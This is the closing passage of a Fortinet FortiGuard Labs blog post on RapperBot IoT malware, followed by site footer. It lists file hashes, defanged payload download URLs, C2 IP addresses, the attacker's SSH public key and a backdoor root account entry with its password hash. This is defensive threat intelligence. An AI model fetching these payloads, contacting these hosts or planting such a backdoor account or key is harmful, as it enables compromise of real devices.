2479932a6690f070fa344e5222e3fbb6ad9c880294d5b822d7a3ec27f1b8b8d5<br />
1d5e6624a2ce55616ef078a72f25c9d71a3dbc0175522c0d8e07233115824f96<br />
746106403a98aea357b80f17910b641db9c4fedbb3968e75d836e8b1d5712a62<br />
ddf5aff0485f395c7e6c3de868b15212129962b4b9c8040bef6679ad880e3f31<br />
e56edaa1e06403757e6e2362383d41db4e4453aafda144bb36080a1f1b899a02<br />
55ff25b090dc1b380d8ca152428ba28ec14e9ef13a48b3fd162e965244b0d39b<br />
8e9f87bb25ff83e4ad970366bba47afb838028f7028ea3a7c73c4d08906ec102<br />
d86d158778a90f6633b41a10e169b25e3cb1eb35b369a9168ec64b2d8b3cbeec<br />
ff09cf7dfd1dc1466815d4df098065510eec504099ebb02b830309067031fe04</p>
<h3>Download URLs</h3>
<p>hxxp://31[.]44[.]185[.]235/x86<br />
hxxp://31[.]44[.]185[.]235/mips<br />
hxxp://31[.]44[.]185[.]235/arm7<br />
hxxp://2[.]58[.]149[.]116/arm<br />
hxxp://2[.]58[.]149[.]116/spc<br />
hxxp://2[.]58[.]149[.]116/mips<br />
hxxp://2[.]58[.]149[.]116/x86_64<br />
hxxp://2[.]58[.]149[.]116/ssh/arm7<br />
hxxp://2[.]58[.]149[.]116/ssh/mips<br />
hxxp://2[.]58[.]149[.]116/ssh/x86<br />
hxxp://2[.]58[.]149[.]116/ssh/spc<br />
hxxp://194[.]31[.]98[.]244/ssh/new/spc<br />
hxxp://194[.]31[.]98[.]244/ssh/new/x86<br />
hxxp://194[.]31[.]98[.]244/ssh/new/mips<br />
hxxp://194[.]31[.]98[.]244/ssh/new/arm7<br />
hxxp://194[.]31[.]98[.]244/ssh/new/arm<br />
hxxp://194[.]31[.]98[.]244/ssh/new/x86<br />
hxxp://194[.]31[.]98[.]244/ssh/new/mips<br />
hxxp://194[.]31[.]98[.]244/ssh/new/arm7<br />
hxxp://194[.]31[.]98[.]244/ssh/new/arm<br />
hxxp://185[.]225[.]73[.]196/ssh/new/arm<br />
hxxp://185[.]225[.]73[.]196/ssh/new/arm7<br />
hxxp://185[.]225[.]73[.]196/ssh/new/mips<br />
hxxp//185[.]225[.]73[.]196/ssh/new/x86<br />
</p>
<h3>C2</h3>
<p>31[.]44[.]185[.]235<br />
2[.]58[.]149[.]116<br />
194[.]31[.]98[.]244<br />
185[.]225[.]73[.]196<br />
</p>
<h3>Threat Actor SSH public key</h3>


</div>
<div class="raw-import aem-GridColumn aem-GridColumn--default--12">
<div class="text-container"><p><span style="font-size:14px"><span style="font-family:Consolas">AAAAB3NzaC1yc2EAAAADAQABAAACAQC/yU0iqklqw6etPlUon4mZzxslFWq8G8sRyluQMD3i8tpQWT2cX/mwGgSRCz7HMLyxt87olYIPemTIRBiyqk8SLD3ijQpfZwQ9vsHc47hdTBfj89FeHJ
GGm1KpWg8lrXeMW+5jIXTFmEFhbJ18wc25Dcds4QCM0DvZGr/Pg4+kqJ0gLyqYmB2fdNzBcU05QhhWW6tSuYcXcyAz8Cp73JmN6TcPuVqHeFYDg05KweYqTqThFFHbdxdqqrWy6fNt8q/cgI30
NBa5W2LyZ4b1v6324IEJuxImARIxTc96Igaf30LUza8kbZyc3bewY6IsFUN1PjQJcJi0ubVLyWyyJ554Tv8BBfPdY4jqCr4PzaJ2Rc1JFJYUSVVT4yX2p7L6iRpW212eZmqLMSoR5a2a/tO2s1
giIlb+0EHtFWc2QH7yz/ZBjnun7opIoslLVvYJ9cxMoLeLr5Ig+zny+IEA3x090xtcL62X0jea6btVnYo7UN2BARziisZze6oVuOTCBijuyvOM6ROZ6s/wl4CQAOSLDeFIP5L1paP9V1XLaYLD
BAodNaUPFfTxggH3tZrnnU8Dge5/1JNa08F3WNUPM1S1x8L2HMatwc82x35jXyBSp3AMbdxMPhvyYI8v2J1PqJH8OqGTVjdWe40mD2osRgLo1EOfP/SFBTD5VEo95K2ZLQ==</span></span></p>
</div>
</div>
<div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12">
  <h3>Threat Actor root user</h3>
<p><span style="font-size: 14.0px;"><span style="font-family: Consolas;">/etc /passwd suhelper:x:0:0::/:</span></span></p>
<p><span style="font-size: 14.0px;"><span style="font-family: Consolas;">/etc /shadow suhelper:$1$1OJBlhUV$E9DMK0xdoZb8W8wVOibPQ/:19185:0:99999:7:::</span></span></p>


</div>
<div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12">
  <p><i>Learn more about Fortinet’s <a href="https://www.fortinet.com/fortiguard/labs?utm_source=blog&amp;utm_campaign=fortiguard-labs">FortiGuard Labs</a> threat research and intelligence organization and the FortiGuard Security Subscriptions and Services <a href="https://www.fortinet.com/fortiguard/labs?tab=security-bundles&amp;utm_source=blog&amp;utm_campaign=security-bundles">portfolio</a>.</i></p>


</div>
<div class="raw-import aem-GridColumn aem-GridColumn--default--12">
<div class="text-container"><div id="om-b2dxtopzidsdt3fkzfsv-holder"></div> </div>
</div>

    
</div>
</div>
<div class="b16-blog-tags aem-GridColumn aem-GridColumn--default--12">



  <div class="b16-blog-tags__container text-container" style="display:none">
    <span class="b16-blog-tags__headline">Tags:</span>
    <p class="b16-blog-tags__tag-links">
      <a href="https://www.fortinet.com/blog/tags-search.html?tag=iot-security">iot security</a>, 
    
      <a href="https://www.fortinet.com/blog/tags-search.html?tag=fortiguard-labs">FortiGuard Labs</a>, 
    
      <a href="https://www.fortinet.com/blog/tags-search.html?tag=malware-analysis">malware analysis</a>, 
    
      <a href="https://www.fortinet.com/blog/tags-search.html?tag=rapperbot">RapperBot</a>
    </p>
  </div>

</div>
<section class="b12-related aem-GridColumn aem-GridColumn--default--12">




<div class="b12-related__container text-container">
    

    
    
    <h3>Related Posts</h3>
    <div class="b12-related__posts">
        
        <a href="/blog/threat-research/fortinet-researchers-discover-vulnerabilities-in-siemens-solutions" class="b12-related__post b12-related__post-0">
            <div class="b12-related__image" style="background-image:url(/content/dam/fortinet-blog/article-images/fg-research-siems-zero-day-thumb.jpg.thumb.319.319.png);">
                <img class="ratio" alt="Fortinet Researcher Discover Vulnerabilities in Siemens Solutions: PADS Standard Layout Viewer and PADS Standard Plus Layout Viewer" aria-hidden="true" src=""/>
            </div>

            <div class="b12-related__text">
                <p class="b12-related__category">
                    Threat Research
                </p>
                <h5 class="b12-related__title">Fortinet Researcher Discover Vulnerabilities in Siemens Solutions: PADS Standard Layout Viewer and PADS Standard Plus Layout Viewer</h5>
            </div>
        </a>
    
    
        
        <a href="/blog/threat-research/new-variant-of-qakbot-spread-by-phishing-emails" class="b12-related__post b12-related__post-1">
            <div class="b12-related__image" style="background-image:url(/content/dam/fortinet-blog/article-images/qakbot-variant-phishing-html-thumb.jpg.thumb.319.319.png);">
                <img class="ratio" alt="New Variant of QakBot Being Spread by HTML File Attached to Phishing Emails" aria-hidden="true" src=""/>
            </div>

            <div class="b12-related__text">
                <p class="b12-related__category">
                    Threat Research
                </p>
                <h5 class="b12-related__title">New Variant of QakBot Being Spread by HTML File Attached to Phishing Emails</h5>
            </div>
        </a>
    
    
        
        <a href="/blog/threat-research/fortiguard-labs-discovers-three-vulnerabilities-in-siemens-teamcenter" class="b12-related__post b12-related__post-2">
            <div class="b12-related__image" style="background-image:url(/content/dam/fortinet-blog/article-images/siemens-vuln-discovery-center-thumb.jpg.thumb.319.319.png);">
                <img class="ratio" alt="FortiGuard Labs Discovers Three Vulnerabilities in Siemens’ Teamcenter Solutions" aria-hidden="true" src=""/>
            </div>

            <div class="b12-related__text">
                <p class="b12-related__category">
                    Threat Research
                </p>
                <h5 class="b12-related__title">FortiGuard Labs Discovers Three Vulnerabilities in Siemens’ Teamcenter Solutions</h5>
            </div>
        </a>
    
    </div>
</div>


</section>
<div class="b13-comment-section aem-GridColumn aem-GridColumn--default--12">


<div class="b13-comment-section__container text-container">


  <!--data-sly-test="true - got replaced with false to disable the discussion event-->
  
</div>
</div>
<div class="b6-footer aem-GridColumn aem-GridColumn--default--12">


  

  <div class="b6-footer__container text-container">
    <div class="b6-footer__footer-info">
      <div class="b6-footer__logo">
        <a href="https://www.fortinet.com" target="_blank">
          <img src="/content/dam/fortinet-blog/fortinet-logo-white.svg" alt="Fortinet"/>
        </a>
      </div>
      <div class="b6-footer__social-footer">
        <ul>
          
            <li class="social-icon facebook">
              <a href="https://www.facebook.com/fortinet" target="_blank">
                
    <svg viewBox="0 0 9 18" xmlns="http://www.w3.org/2000/svg">
        <path d="M8.934.758v3.385H7.24c-.583 0-.845.685-.845 1.27v2.114h2.54v3.385h-2.54v6.77H3.01v-6.77H.472V7.527H3.01V4.143c0-1.87 1.516-3.385 3.385-3.385h2.54z" fill-opacity=".8" fill="#fff" fill-rule="evenodd"></path>
    </svg>

              </a>
            </li>
          
            <li class="social-icon twitter">
              <a href="https://www.twitter.com/fortinet" target="_blank">
                
    <svg viewBox="0 0 19 15" xmlns="http://www.w3.org/2000/svg">
        <path d="M18.17 2.296c-.652.296-1.354.49-2.082.584.745-.448 1.32-1.16 1.59-2.014-.702.423-1.48.72-2.3.89-.67-.73-1.61-1.152-2.675-1.152-1.988 0-3.613 1.625-3.613 3.63 0 .288.034.567.093.83-3.012-.153-5.694-1.6-7.48-3.792-.313.534-.49 1.16-.49 1.82 0 1.26.634 2.377 1.616 3.012-.61 0-1.16-.17-1.65-.423v.03c0 1.76 1.25 3.237 2.91 3.567-.31.084-.63.127-.96.127-.23 0-.46-.026-.68-.07.455 1.43 1.784 2.497 3.383 2.52-1.235.984-2.8 1.56-4.51 1.56-.288 0-.575-.018-.863-.05 1.61 1.03 3.52 1.632 5.57 1.632 6.667 0 10.33-5.534 10.33-10.332 0-.16 0-.313-.007-.474.71-.508 1.32-1.15 1.81-1.888z" fill-opacity=".8" fill="#fff" fill-rule="evenodd"></path>
    </svg>

              </a>
            </li>
          
            <li class="social-icon youtube">
              <a href="https://www.youtube.com/channel/UCJHo4AuVomwMRzgkA5DQEOA?sub_confirmation=1" target="_blank">
                
    <svg viewBox="0 0 18 14" xmlns="http://www.w3.org/2000/svg">
        <path d="M7.472 11.027V3.412L12.55 7.22l-5.08 3.806zM15.934.787C15.426.62 12.294.45 9.164.45c-3.13 0-6.26.16-6.77.322-1.32.44-1.69 3.4-1.69 6.447 0 3.03.37 6 1.69 6.43.51.17 3.64.33 6.77.33 3.13 0 6.262-.16 6.77-.33 1.32-.43 1.692-3.4 1.692-6.44 0-3.047-.372-6-1.692-6.43z" fill-opacity=".8" fill="#fff" fill-rule="evenodd"></path>
    </svg>

              </a>
            </li>
          
            <li class="social-icon linkedin">
              <a href="https://www.linkedin.com/company/fortinet" target="_blank">
                
    <svg viewBox="0 0 16 16" xmlns="http://www.w3.org/2000/svg">
        <path d="M15.934 15.835H12.55v-5.712c0-.897-1.008-1.64-1.905-1.64s-1.48.743-1.48 1.64v5.712H5.78V5.68h3.385v1.693c.558-.905 1.996-1.49 2.96-1.49 2.116 0 3.81 1.727 3.81 3.817v6.135zm-11.846 0H.703V5.68h3.385v10.155zM2.395.605c.935 0 1.693.757 1.693 1.69 0 .936-.758 1.694-1.693 1.694S.703 3.23.703 2.29C.703 1.36 1.46.6 2.395.6z" fill-opacity=".8" fill="#fff" fill-rule="evenodd"></path>
    </svg>

              </a>
            </li>
          
            <li class="social-icon instagram">
              <a href="https://www.instagram.com/behindthefirewall/" target="_blank">
                
    <svg viewBox="0 0 32 32" xmlns="http://www.w3.org/2000/svg">
        <path class="st0" d="M16,3.7c4,0,4.5,0,6.1,0.1c1.5,0.1,2.3,0.3,2.8,0.5c0.7,0.3,1.2,0.6,1.7,1.1c0.5,0.5,0.8,1,1.1,1.7
          c0.2,0.5,0.4,1.3,0.5,2.8c0.1,1.6,0.1,2.1,0.1,6.1s0,4.5-0.1,6.1c-0.1,1.5-0.3,2.3-0.5,2.8c-0.3,0.7-0.6,1.2-1.1,1.7
          c-0.5,0.5-1,0.8-1.7,1.1c-0.5,0.2-1.3,0.4-2.8,0.5c-1.6,0.1-2.1,0.1-6.1,0.1s-4.5,0-6.1-0.1c-1.5-0.1-2.3-0.3-2.8-0.5
          c-0.7-0.3-1.2-0.6-1.7-1.1c-0.5-0.5-0.8-1-1.1-1.7c-0.2-0.5-0.4-1.3-0.5-2.8C3.7,20.5,3.7,20,3.7,16s0-4.5,0.1-6.1
          c0.1-1.5,0.3-2.3,0.5-2.8C4.6,6.5,4.9,6,5.4,5.4c0.5-0.5,1-0.8,1.7-1.1c0.5-0.2,1.3-0.4,2.8-0.5C11.5,3.7,12,3.7,16,3.7 M16,1
          c-4.1,0-4.6,0-6.2,0.1C8.2,1.2,7.1,1.4,6.2,1.8c-1,0.4-1.8,0.9-2.7,1.7C2.7,4.4,2.2,5.2,1.8,6.2c-0.4,1-0.6,2-0.7,3.6
          C1,11.4,1,11.9,1,16c0,4.1,0,4.6,0.1,6.2c0.1,1.6,0.3,2.7,0.7,3.6c0.4,1,0.9,1.8,1.7,2.7c0.8,0.8,1.7,1.3,2.7,1.7
          c1,0.4,2,0.6,3.6,0.7C11.4,31,11.9,31,16,31s4.6,0,6.2-0.1c1.6-0.1,2.7-0.3,3.6-0.7c1-0.4,1.8-0.9,2.7-1.7c0.8-0.8,1.3-1.7,1.7-2.7
          c0.4-1,0.6-2,0.7-3.6C31,20.6,31,20.1,31,16s0-4.6-0.1-6.2c-0.1-1.6-0.3-2.7-0.7-3.6c-0.4-1-0.9-1.8-1.7-2.7
          c-0.8-0.8-1.7-1.3-2.7-1.7c-1-0.4-2-0.6-3.6-0.7C20.6,1,20.1,1,16,1L16,1z" fill-opacity=".8" fill="#fff" fill-rule="evenodd"></path>
        <path class="st0" d="M16,8.3c-4.3,0-7.7,3.4-7.7,7.7s3.4,7.7,7.7,7.7s7.7-3.4,7.7-7.7S20.3,8.3,16,8.3z M16,21c-2.8,0-5-2.2-5-5
          s2.2-5,5-5s5,2.2,5,5S18.8,21,16,21z" fill-opacity=".8" fill="#fff" fill-rule="evenodd"></path>
        <circle class="st0" cx="24" cy="8" r="1.8" fill-opacity=".8" fill="#fff" fill-rule="evenodd"></circle>
    </svg>

              </a>
            </li>
          
            <li class="social-icon rss">
              <a href="https://www.fortinet.com/rss-feeds.html" target="_blank">
                
    <svg viewBox="0 0 18 18" xmlns="http://www.w3.org/2000/svg">
        <path d="M3.072 17.68c-1.27 0-2.37-1.1-2.37-2.368 0-1.27 1.1-2.37 2.37-2.37s2.37 1.1 2.37 2.37-1.016 2.37-2.37 2.37zM.702.76v2.538c7.955 0 14.386 6.43 14.386 14.385h2.538C17.626 8.336 10.05.76.703.76zm0 5.162V8.46c5.078 0 9.224 4.146 9.224 9.223h2.54c0-6.514-5.248-11.76-11.763-11.76z" fill-opacity=".8" fill="#fff" fill-rule="evenodd"></path>
    </svg>

              </a>
            </li>
          
        </ul>
      </div>
    </div>
    <div class="b6-footer__footer-links">
      
        <div class="b6-footer__footer-links-column">
          <h4 class="b6-footer__header">News &amp; Articles</h4>
          <ul>
            
              <li>
                <a href="https://www.fortinet.com/corporate/about-us/newsroom/press-releases.html" target="_self">News Releases</a>
              </li>
            
              <li>
                <a href="https://www.fortinet.com/corporate/about-us/newsroom/news.html" target="_blank">News Articles</a>
              </li>
            
              <li>
                <a href="https://www.fortinet.com/corporate/about-us/contact-us/fortinet-trademark-guidelines.html" target="_self">Trademarks</a>
              </li>
            
          </ul>
        </div>
      
        <div class="b6-footer__footer-links-column">
          <h4 class="b6-footer__header">Security Research</h4>
          <ul>
            
              <li>
                <a href="https://www.fortinet.com/fortiguard/threat-intelligence/threat-research.html" target="_self">Threat Research</a>
              </li>
            
              <li>
                <a href="https://fortiguard.com/" target="_self">FortiGuard Labs</a>
              </li>
            
              <li>
                <a href="https://www.fortinet.com/fortiguard/threat-intelligence/threat-map.html" target="_self">Threat Map</a>
              </li>
            
              <li>
                <a href="https://secure.fortinet.com/fortiguard" target="_blank">Threat Briefs</a>
              </li>
            
              <li>
                <a href="https://www.fortinet.com/solutions/ransomware.html" target="_self">Ransomware</a>
              </li>
            
          </ul>
        </div>
      
        <div class="b6-footer__footer-links-column">
          <h4 class="b6-footer__header">Connect With Us</h4>
          <ul>
            
              <li>
                <a href="/content/fortinet-blog/us/en" target="_self">Blog</a>
              </li>
            
              <li>
                <a href="https://fusecommunity.fortinet.com" target="_self">Fuse Community</a>
              </li>
            
          </ul>
        </div>
      
        <div class="b6-footer__footer-links-column">
          <h4 class="b6-footer__header">Company</h4>
          <ul>
            
              <li>
                <a href="https://www.fortinet.com/corporate/about-us/about-us" target="_blank">About Us</a>
              </li>
            
              <li>
                <a href="https://www.fortinet.com/corporate/about-us/why-fortinet" target="_blank">Why Fortinet</a>
              </li>
            
              <li>
                <a href="https://www.fortinet.com/corporate/about-us/security-fabric" target="_self">Security Fabric</a>
              </li>
            
              <li>
                <a href="https://www.fortinet.com/corporate/about-us/executive-management" target="_self">Exec Mgmt</a>
              </li>
            
              <li>
                <a href="https://www.fortinet.com/corporate/careers" target="_self">Careers</a>
              </li>
            
              <li>
                <a href="https://www.fortinet.com/corporate/about-us/product-certifications" target="_self">Certifications</a>
              </li>
            
              <li>
                <a href="https://www.fortinet.com/corporate/about-us/events" target="_self">Events</a>
              </li>
            
              <li>
                <a href="https://www.fortinet.com/corporate/about-us/industry-awards" target="_self">Industry Awards</a>
              </li>
            
              <li>
                <a href="https://www.fortinet.com/sitemap" target="_self">Sitemap</a>
              </li>
            
              <li>
                <a href="https://www.fortinet.com/blog/blog-sitemap" target="_self">Blog Sitemap</a>
              </li>
            
          </ul>
        </div>
      
      <div class="b6-footer__contact-info">
        <h4 class="b6-footer__header">Contact Us</h4>
        <ul>
          <li>(866) 868-3678</li>
        </ul>
      </div>
    </div>
    <div class="b6-footer__copyright">
      <div class="b6-footer__copyright-info">
        <p class="b6-footer__copyright-text">Copyright © 2022 Fortinet, Inc. All Rights Reserved</p>
        
          <a class="b6-footer__copyright-link" href="https://www.fortinet.com/corporate/about-us/legal.html" target="_blank">Terms of Services</a>
        
          <a class="b6-footer__copyright-link" href="https://www.fortinet.com/corporate/about-us/privacy.html" target="_blank">Privacy Policy</a>
        
        <span class="ot-ftnt-cookie-settings"> | <a href="#" onclick="Optanon.ToggleInfoDisplay()">Cookie Settings</a></span>
      </div>
    </div>
  </div>

<!-- Launch COnfiguration -->


<!-- END Launch COnfiguration --></div>

    
</div>
</div>


    
    
    

    
        <script type="text/javascript" src="/etc.clientlibs/fortinet-blog/clientlibs/clientlib-base.min.js?ver=071522"></script>


    



    
        
            <!-- BE IXF: The following <div> block needs to be placed in the location where the link block will be displayed
                        BE IXF: For your website, the location is above/below ...-->
            <div class="brightedge-wrapper">
                <div class="wrap footerwrap">
                    <div class="be-ix-link-block be-ix-link-block-blog">
                        <div class="be-related-link-container"><div class="be-label">Also of Interest</div><ul class="be-list"><li class="be-list-item"><a class="be-related-link" href="https://www.fortinet.com/blog/business-and-technology/why-ztna-in-the-cloud-isnt-enough">Why ZTNA in the Cloud Isn&#39;t Enough</a></li><li class="be-list-item"><a class="be-related-link" href="https://www.fortinet.com/blog/business-and-technology/worlds-number-one-network-firewall-delivers-powerful-networking-solutions">Converging NOC &amp; SOC starts with FortiGate</a></li><li class="be-list-item"><a class="be-related-link" href="https://www.fortinet.com/blog/ciso-collective/top-security-threats-for-government">DOJ &amp; Top Security Threats</a></li><li class="be-list-item"><a class="be-related-link" href="https://www.fortinet.com/blog/industry-trends/paying-ransomware">Pay Ransomware Settlements?</a></li></ul></div>
<!--
   be_sdkms_pub:link-block-publisher; link-block-publisher_1.0.0.0; bodystr;
   be_sdkms_date_modified:pn_tstr:Tue Aug 16 18:19:05 PDT 2022; pn_epoch:1660699145113;
   be_sdkms_timer: 0;
-->

                        
                    </div>
                </div></div>
         <!-- Condition close for mode check -->
    
    

    </body>
    </html>
